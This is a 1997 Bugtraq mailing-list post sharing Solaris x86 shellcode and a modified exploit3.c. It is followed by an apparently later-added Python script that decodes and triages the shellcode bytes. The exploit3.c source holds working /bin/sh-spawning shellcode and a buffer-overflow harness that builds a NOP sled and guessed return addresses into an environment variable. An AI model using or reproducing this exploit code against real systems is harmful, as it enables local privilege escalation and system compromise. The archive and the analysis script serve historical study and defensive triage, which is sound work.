Bugtraq mailing list archives
Solaris x86 buffer overflows
From: jfb11 () MICRO-NET COM (jim bresler)
Date: Thu, 12 Jun 1997 08:49:26 -0400
Hi, attached is the "shellcode" for Solaris x86 I wrote yesterday.
This includes the code I assembled (it will core dump when run directly,
because it is self-modifying), a test program that should spawn a shell,
and a modified version of Aleph One's exploit3.c.
Note that most buffer overflows are self-modifying in one part; this
changes itself in two parts. Because a long call is used and
registers cannot be used as arguments, the arguments to the lcall should
be ignored. To avoid the need to leave a null character in at run time,
the arguments are changed at run time.
Jim <jfb11 () micro-net com>
Attachment: solarisx86_shellcode.s

Attachment: test_sc.c

Attachment: exploit3.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEFAULT_OFFSET                     0
#define DEFAULT_BUFFER_SIZE              512
#define NOP                             0x90

/* Solaris x86 shellcode, the assembled form of the attached solarisx86_shellcode.s */
char shellcode[] =
    "\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3"
    "\x33\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05"
    "\x07\x88\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff"
    "\xff\x0f\x0f\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46"
    "\x0c\x50\x8d\x46\x08\x50\x8b\x46\x08\xe8\xbd\xff\xff\xff"
    "\x83\xc4\x0c\x6a\x01\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4"
    "\xff\xff\xff/bin/sh";

/* Return the current stack pointer; relies on %eax carrying the return value. */
unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_sp() - offset;
  printf("Using address: 0x%x\n", addr);

  /* Fill the whole buffer with the guessed return address. */
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  /* The first half of the buffer becomes a NOP sled. */
  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  /* The shellcode is placed in the middle of the buffer. */
  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  /* Export the buffer as the environment variable EGG for the spawned shell. */
  memcpy(buff,"EGG=",4);
  putenv(buff);
  system("/usr/local/bin/bash");
  return 0;
}
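Added here as an analyst-side example, not part of Jim's post or any of its attachments: a small Python helper that pulls a `char shellcode[]` declaration out of C source such as exploit3.c, decodes the C escapes the way a compiler does, and reports the properties the post talks about, chiefly whether the byte string is free of NUL bytes (which is what the runtime patching of the lcall operands achieves) and which readable strings it embeds. The sample input is the declaration from exploit3.c transcribed into the script; the function names and report fields are my own choices, not anything from the post.

```python
import re

# Sample input: the shellcode[] declaration from the exploit3.c attachment,
# transcribed here so the script runs offline. Only this declaration is needed.
SAMPLE_C_SOURCE = r'''
char shellcode[] =
    "\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3"
    "\x33\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05"
    "\x07\x88\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff"
    "\xff\x0f\x0f\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46"
    "\x0c\x50\x8d\x46\x08\x50\x8b\x46\x08\xe8\xbd\xff\xff\xff"
    "\x83\xc4\x0c\x6a\x01\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4"
    "\xff\xff\xff/bin/sh";
'''

_SIMPLE_ESCAPES = {"n": 0x0A, "t": 0x09, "r": 0x0D, "a": 0x07, "b": 0x08,
                   "f": 0x0C, "v": 0x0B, "\\": 0x5C, '"': 0x22, "'": 0x27}


def decode_c_string(literal):
    """Decode the body of one C string literal (without the quotes) to bytes.

    Returns (payload, notes). Notes flag escapes whose C semantics surprise
    people: '\\x' greedily eats every following hex digit, so "\\x41b" is one
    (overflowing) escape, not 'A' followed by 'b'.
    """
    out = bytearray()
    notes = []
    i = 0
    while i < len(literal):
        ch = literal[i]
        if ch != "\\":
            out.append(ord(ch))
            i += 1
            continue
        if i + 1 >= len(literal):
            raise ValueError("trailing backslash at offset %d" % i)
        esc = literal[i + 1]
        if esc == "x":
            m = re.match(r"[0-9A-Fa-f]+", literal[i + 2:])
            if not m:
                raise ValueError("\\x escape without hex digits at offset %d" % i)
            digits = m.group(0)
            if len(digits) > 2:
                notes.append("\\x%s consumes %d hex digits; value truncated to one byte"
                             % (digits, len(digits)))
            out.append(int(digits, 16) & 0xFF)
            i += 2 + len(digits)
        elif esc in "01234567":
            m = re.match(r"[0-7]{1,3}", literal[i + 1:])
            out.append(int(m.group(0), 8) & 0xFF)
            i += 1 + len(m.group(0))
        elif esc in _SIMPLE_ESCAPES:
            out.append(_SIMPLE_ESCAPES[esc])
            i += 2
        else:
            raise ValueError("unknown escape \\%s at offset %d" % (esc, i))
    return bytes(out), notes


def extract_c_array(c_source, name="shellcode"):
    """Find `char <name>[] = "..." "...";` and return its bytes plus notes.

    Adjacent literals are decoded separately and then joined, which is the
    order C specifies (escapes first, concatenation afterwards).
    """
    decl = re.search(r'char\s+' + re.escape(name) + r'\s*\[\]\s*=\s*'
                     r'((?:\s*"(?:[^"\\]|\\.)*")+)\s*;', c_source, re.S)
    if not decl:
        raise ValueError("no declaration of char %s[] found" % name)
    payload = b""
    notes = []
    for piece in re.findall(r'"((?:[^"\\]|\\.)*)"', decl.group(1), re.S):
        chunk, chunk_notes = decode_c_string(piece)
        payload += chunk
        notes.extend(chunk_notes)
    return payload, notes


def printable_strings(data, min_len=4):
    """Runs of printable ASCII at least min_len long (the strings(1) idea)."""
    return [m.group(0).decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def triage(payload):
    """Summarise the properties a responder checks first on a raw payload."""
    return {
        "length": len(payload),
        # A NUL inside the bytes would stop a strcpy-style copy early; the post's
        # runtime patching of the lcall operands exists precisely to avoid one.
        "nul_free": b"\x00" not in payload,
        "strings": printable_strings(payload),
        # 0x9a is the x86 far-call (lcall) opcode; a byte match is only a hint,
        # since the same value can occur as data.
        "far_call_opcode_present": b"\x9a" in payload,
    }


if __name__ == "__main__":
    sc, notes = extract_c_array(SAMPLE_C_SOURCE)
    for key, value in triage(sc).items():
        print("%-24s %r" % (key, value))
    for note in notes:
        print("note:", note)
```

Run as-is it reports on the transcribed declaration; point `extract_c_array` at any other C source (a decoded mail attachment, a file read from disk) to get the same summary. The escape decoder is deliberately strict about C's greedy `\x` rule, because a hand-typed literal that trips over it silently produces different bytes than the author intended.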